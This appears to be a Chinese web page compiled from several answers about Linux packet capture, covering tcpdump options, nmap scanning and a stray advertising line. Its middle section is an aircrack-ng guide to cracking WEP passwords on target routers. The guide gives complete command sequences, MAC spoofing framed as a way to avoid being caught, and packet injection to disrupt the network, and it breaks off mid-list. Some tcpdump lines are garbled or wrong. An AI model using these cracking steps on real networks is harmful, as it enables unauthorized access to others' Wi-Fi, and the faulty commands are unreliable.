linux系统抓包命令 linux抓包指令详解

Linux下如何抓指定IP的包

用tcpdum命令可以抓指定IP的包，具体命令为：

成都创新互联专注于平阴企业网站建设,响应式网站,商城开发。平阴网站建设公司,为平阴等地区提供建站服务。全流程按需网站策划，专业设计，全程项目跟踪，成都创新互联专业和态度为您提供的服务

tcpdump tcp -i eth1 -t -s 0 -c 100 and dst port 22 and src net 192.168.1.1 -w ./target.cap

参数解析：

tcp: ip icmp arp rarp 和 tcp、udp、icmp这些选项等都要放到第一个参数的位置，用来过滤数据报的类型。

-i eth1 : 只抓经过接口eth1的包

-t : 不显示时间戳

-s 0 : 抓取数据包时默认抓取长度为68字节。加上-S 0 后可以抓到完整的数据包

-c 100 : 只抓取100个数据包

dst port  22 : 抓取目标端口是22的数据包

src net 192.168.1.0/24 : 数据包的源网络地址为192.168.1.1

-w ./target.cap : 保存成cap文件，方便用ethereal(即wireshark)分析

扩展资料

tcpdump语法格式：

tcpdump [-adeflnNOpqStvx][-c数据包数目][-dd][-ddd][-F表达文件][-i网络界面][-r数据包文件][-s数据包大小][-tt][-T数据包类型][-vv][-w数据包文件][输出数据栏位]

tcpdump主要参数说明：

1、-a 尝试将网络和广播地址转换成名称。

2、-c数据包数目 收到指定的数据包数目后，就停止进行倾倒操作。

3、-d 把编译过的数据包编码转换成可阅读的格式，并倾倒到标准输出。

4、-dd 把编译过的数据包编码转换成C语言的格式，并倾倒到标准输出。

5、-ddd 把编译过的数据包编码转换成十进制数字的格式，并倾倒到标准输出。

6、-e 在每列倾倒资料上显示连接层级的文件头。

7、-f 用数字显示网际网络地址。

8、-F表达文件 指定内含表达方式的文件。

9、-i网络界面 使用指定的网络截面送出数据包。

10、-l 使用标准输出列的缓冲区。

11、-n 不把主机的网络地址转换成名字。

12、-N 不列出域名。

airodump-ng linux下怎样抓包

Aircrack-ng系列工具也有Windows 平台版本，但是本人的小黑的始终不能在win下抓包，所以只能 弃 Windows 从Linux 了，另外 Windows 下扫描到的 AP 也比 Linux 下少了很多。其实 Windows 并不完整的支持 TCP/IP 协议族，有些协议Windows 直接丢弃不用。网络本来从一开始就是 Unix 的天下，Windows 只是在后来加入了网络的功能。

Aircrack-ng工具包有很多工具，我用到的工具主要有以下几个：

airmon-ng 处理网卡工作模式

airodump-ng 抓包

aircrack-ng 破解

aireplay-ng 发包，干扰

另外还要用到以下 linux 命令:

ifconfig 查看修改网卡状态和参数

macchanger 伪造 MAC

iwconfig 主要针对无线网卡的工具 (同 ifconfig)

iwlist 获取无线网络的更详细信息

另外还有其他的 linux 基本命令，我就不提示了。

具体破解步骤：

1. 修改无线网卡状态：先 dow

2. 伪造无线网卡的 MAC 地址：安全起见，减少被抓到的可能

3. 修改网卡工作模式：进入Monitor状态，会产生一个虚拟的网卡

4. 修改无线网卡状态： up

5. 查看网络状态，记录下 AP 的 MAC 和本机的 MAC ，确定攻击目标

6. 监听抓包：生成 .cap 或 .ivs

7. 干扰无线网络：截取无线数据包，发送垃圾数据包，用来获得更多的有效数据包

8. 破解 .cap 或 .ivs ，获得 WEP 密码，完成破解

Crack Mode一共有5种请酌情使用还有网卡不一定是ath1也有可能是wifi0，ath0等等

ifconfig -a

ifconfig -a ath0 up

airmon-ng start wifi0 6

airodump-ng --ivs -w 目标路由器IVS文件 -c 6 ath1

airodump-ng ath1

aireplay-ng -1 0 -e 目标路由器SSID -a 目标MAC -h 本机MAC ath1

----------- -2 Crack Mode-----------

aireplay-ng -2 -p 0841 -c ffffffffffff -b 目标MAC -h 本机MAC ath1

----------- -3 Crack Mode-----------

aireplay-ng -3 -b 目标MAC -h 本机MAC ath1

----------- -4 Crack Mode-----------

aireplay-ng -4 -b 目标MAC -h 本机MAC ath1

packetforge-ng -0 -a 目标MAC -h 本机MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp

aireplay-ng -2 -r MyArp -x 256 ath1

----------- -5 Crack Mode-----------

aireplay-ng -5 -b 目标MAC -h 本机MAC ath1

packetforge-ng -0 -a 目标MAC -h 本机MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp

aireplay-ng -2 -r MyArp -x 256 ath1

-----------Crack Key-----------

aircrack-ng -n 64 -b 目标MAC 目标路由器IVS文件-01.ivs

——————————————————————————————

　下面详细介绍一下各个命令的基本用法（参照命令的英文说明）

1. ifconfig

用来配置网卡，我们这里主要用来 禁用和启用 网卡：

ifconfig ath0 down

ifconfig ath0 up

禁用一下网卡的目的是为了下一步修改 MAC 。

2.macchanger

用来改变网卡的 MAC 地址，具体用法如下：

usage: macchanger [options] device

-h 显示帮助

-V 显示版本

-s 显示当前MAC

-e 不改变mac,使用硬件厂商写入的MAC

-a 自动生成一个同类型的MAC，同厂商的

-A 自动生成一个不同类型的MAC，不同厂商的

-r 生成任意MAC

-l 显示已知厂商的网卡MAC地址分配，这个很有用，可以根据MAC查出来是哪个厂商生产的产品

-m 设置一个自定义的MAC 如: macchanger --mac=00:34:00:00:00:00 ath0 。

3.airmon-ng

启动无线网卡进入 Monitor 模式，

useage: airmon-ng start|stop|check interface [channel]

start|stop|check启动，停止，检测

interface指定无线网卡

[channel] 监听频道，现代大多数无线路由默认是 6，随便扫描一下都是这个频道，网管们应该换换了

4.iwconfig

专用的无线网卡配置工具，用来配置特殊的网络信息，不带参数时显示可用网络。

useage：iwconfig interface [options]

[essid{NN|ON|OFF}] 指定essid号 开启关闭

[nwid{NN|on|off}] 指定网络id号 开启关闭

[mode {managed|ad-hoc|....}] 指定无线网络工作模式/类型

[freq N.NNNN[K|M|G]] 指定工作频率

[channel N] 指定频道

[ap {N|off|auto}] 指定AP号 关闭/自动

[sens N] sens 号

[nick N] nick 号

[rate {N|auto|fixed}] 速率控制

[rts {N|auto|fixed|off}] rts控制，如果不知道什么是RTS，那就回去好好去学网络，不用往下看了

[frag {N|auto|fixed|off}] 碎片控制

[enc {NNNN-NNNN|off}] 范围

[power {period N|timeout N}] 电源 频率/超时

[retry {limit N|lifetime N}] 重试 限次/超时

[txpower N{mw|dBm}] 功率 毫瓦/分贝

[commit] 处理

5.iwlist

主要用来显示无线网卡的一些附加信息,同上

useage: iwlist [interface] options

scanning 扫描

frequency 频率

channel 频道

bitrate 速率

rate 速率

encryption 加密

key 密钥

power 电源

txpower 功率

ap ap

accespoints ap

peers 直连

event 事件

6.airodump-ng

抓包工具,我最喜欢用的,详细用法如下:

usage: airodump-ng options interface[,interface,...]

Options:

--ivs :仅将抓取信息保存为 .ivs

--gpsd :使用 GPSd

--write prefix :保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分

-w :同 --write

--beacons :保存所有的 beacons ,默认情况况下是丢弃那些无用的数据包的

--update secs :显示更新延迟,没有用过

--showack :显示ack/cts/rts状态,还是那句,不知道rts就不用看了

-h :隐藏已知的,配合上面的选项使用

-f msecs :跳频时间

--berlin secs :无数据包接收时延迟显示的时间,这句不太好翻译,意思是当那个信号发出设备没有发出数据包多少时间之后,就停止对它的监视.默认120秒.建议学好英文去读原文,翻译的都会有出入,这是我的理解.(mhy_mhy注)

-r file :从指定的文件读取数据包.我也想有人给我抓好包放哪里,呵呵

Filter options:

--encrypt suite : 使用密码序列过滤 AP

--netmask netmask : 使用掩码过滤 AP

--bssid bssid : 使用 bssid 过滤 AP

-a : 过滤无关的客户端

默认情况下使用2.4Ghz,你也可以指定其他的频率,通过以下命令操作:

--channel channels:指定频道

--band abg :制定带宽

-C frequencies :指定频率MHz

--cswitch method : 设置频道交换方式

0 : FIFO (default) 先进先出(默认)

1 : Round Robin 循环

2 : Hop on last 最后一跳

-s : 同上

--help : 显示使用方法,翻译到这里,感觉还是英文的贴切一点,建议读原文

7.aireplay-ng

linux下怎么抓包

tcpdump，就可以用这个抓包了，具体使用 tcpdump -vvv -nn -port 80 -w /tmp/file，你也可以用man tcpdump 查看此命令的具体使用

在linux命令行环境下如何抓取网络数据包？

  众所周知，在Windows下开发运行环境下，在调试网络环境时，可以可以很方便的借助wireshark等软件进行抓包分析；并且在linux或者Ubuntu等桌面版里也可以进行安装抓包工具进行抓包分析，但总有一些情况，无法直接运用工具（比如一些没有界面的linux环境系统中），则此时我们就需要使用到最简单的tcpdump命令进行网络抓包。

  一般的，linux下抓包时，抓取特定的网络数据包到当前文件夹下的文件中，再把文件拷贝出来利用Windows下的wireshark软件进行分析。

tcpdump命令详解：（简单举例）

  1、抓取到的文件为filename.cap，然后将此文件拷贝到Windows下，使用wireshar打开后，即可对此文件进行分析。

  2、eth0 是主机的网络适配器名称，具体的参数值可以在linux命令行窗口中通过 ifconfig 指令查询。

Linux 系统扫描nmap与tcpdump抓包

NMAP扫描

一款强大的网络探测利器工具

支持多种探测技术

--ping扫描

--多端口扫描

-- TCP/IP指纹校验

为什么需要扫描?

以获取一些公开/非公开信息为目的

--检测潜在风险

--查找可攻击目标

--收集设备/主机/系统/软件信息

--发现可利用的安全漏洞

基本用法

nmap [扫描类型] [选项] 扫描目标...

常用的扫描类型

常用选项

-sS TCP SYN扫描(半开) 该方式发送SYN到目标端口，如果收到SYN/ACK回复，那么判断端口是开放的；如果收到RST包，说明该端口是关闭的。简单理解就是3次握手只完成一半就可以判断端口是否打开,提高扫描速度

-sT TCP 连接扫描(全开)

-sU UDP扫描

-sP ICMP扫描

-sV 探测打开的端口对应的服务版本信息

-A 目标系统全面分析 (可能会比较慢)

-p 扫描指定端口

1 ) 检查目标主机是否能ping通

2）检查目标主机所开启的TCP服务

3 ) 检查192.168.4.0/24网段内哪些主机开启了FTP、SSH服务

4）检查目标主机所开启的UDP服务

5 ) 探测打开的端口对应的服务版本信息

6）全面分析目标主机192.168.4.100的操作系统信息

tcpdump

命令行抓取数据包工具

基本用法

tcpdump [选项] [过滤条件]

常见监控选项

-i，指定监控的网络接口（默认监听第一个网卡）

-A，转换为 ACSII 码，以方便阅读

-w，将数据包信息保存到指定文件

-r，从指定文件读取数据包信息

常用的过滤条件：

类型：host、net、port、portrange

方向：src、dst

协议：tcp、udp、ip、wlan、arp、……

多个条件组合：and、or、not

案例1

案例2:使用tcpdump分析FTP访问中的明文交换信息

1 ) 安装部署vsftpd服务

2 ) 并启动tcpdump等待抓包

执行tcpdump命令行，添加适当的过滤条件，只抓取访问主机192.168.4.100的21端口的数据通信 ，并转换为ASCII码格式的易读文本。

3 ) case100作为客户端访问case254服务端

4 ) 查看tcpdump抓包

5 ) 再次使用tcpdump抓包，使用-w选项可以将抓取的数据包另存为文件，方便后期慢慢分析。

6 ) tcpdump命令的-r选项，可以去读之前抓取的历史数据文件